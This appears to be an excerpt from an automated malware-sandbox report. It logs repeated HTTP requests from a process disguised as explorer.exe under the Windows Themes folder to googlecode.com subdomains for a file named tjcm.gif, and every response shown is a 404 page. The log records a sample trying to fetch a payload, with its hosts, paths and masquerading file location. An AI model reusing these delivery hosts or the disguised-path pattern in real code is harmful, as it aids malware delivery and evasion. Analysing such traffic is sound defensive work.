                                              116192.168.2.65126864.233.184.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:10:49.102724075 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd03.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:10:49.774389982 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:49 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:10:49.774411917 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              117192.168.2.651269173.194.76.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:10:50.188004017 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd01.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:10:50.887204885 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:50 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:10:50.887232065 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              118192.168.2.651270142.251.173.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:10:52.076356888 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd02.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:10:52.779021978 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:52 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:10:52.779449940 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              119192.168.2.65127164.233.184.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:10:53.934881926 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd03.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:10:54.644493103 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:54 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:10:54.644556046 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              120192.168.2.651272173.194.76.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:10:55.120776892 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd01.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:10:55.795242071 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:55 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:10:55.795267105 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              121192.168.2.651273142.251.173.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:10:56.214842081 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd02.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:10:56.877477884 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:56 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:10:56.877511024 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              122192.168.2.65127464.233.184.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:10:57.255321980 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd03.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:10:58.039904118 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:57 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:10:58.039958954 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              123192.168.2.651275173.194.76.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:10:58.494368076 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd01.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:10:59.171036959 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:59 GMT
